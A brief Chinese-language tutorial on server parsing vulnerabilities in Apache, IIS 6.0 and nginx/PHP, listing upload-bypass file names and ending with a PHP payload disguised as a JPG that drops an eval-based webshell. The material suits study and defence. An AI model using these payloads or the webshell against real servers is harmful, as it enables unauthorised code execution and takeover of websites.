服务器解析漏洞

apache
apache1.x,2.x解析漏洞：
解析文件时，从后向前解析直到遇到第一个可以被识别的后缀名
例如：1.php.abc
因为不能识别abc就向前解析，识别到php，从未将文件解析为php文件
iis
iis6.0解析漏洞：
1.目录解析漏洞：（<=6.0）
如果目录名包含.asp，.asa，.cer，都会被当作asp解析,例如:/xx.asp/shell.jpg
2.文件解析：
服务器默认不解析;后面的内容，因此可上传shell.asp;.jpg
3.优先解析：
如果文件名中包含.asp，.asa，.cer，会优先解析为aps
4.iis7.5与nginx漏洞相似
nginx
nginx解析漏洞并不是本身的漏洞，而是由于php的配置文件出现的漏洞，如果在php配置文件中开启fix_pathinfo这个选项啊，传入shell.jpg/1.php就会将文件名(SCRIPT_FILENAME)认为是shell.jpg,文件类型(PATH_INFO)认为是1.php,就当作php文件来执行了
漏洞形式有：
url/1.jpg/1.php
url/1.jpg%00.php
url/1.jpg%20\0.php
还有一种：
上传一个1.jpg文件，内容为：

<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd]);?>');?>

访问1.jpg/.php就会在这个目录下生成shell.php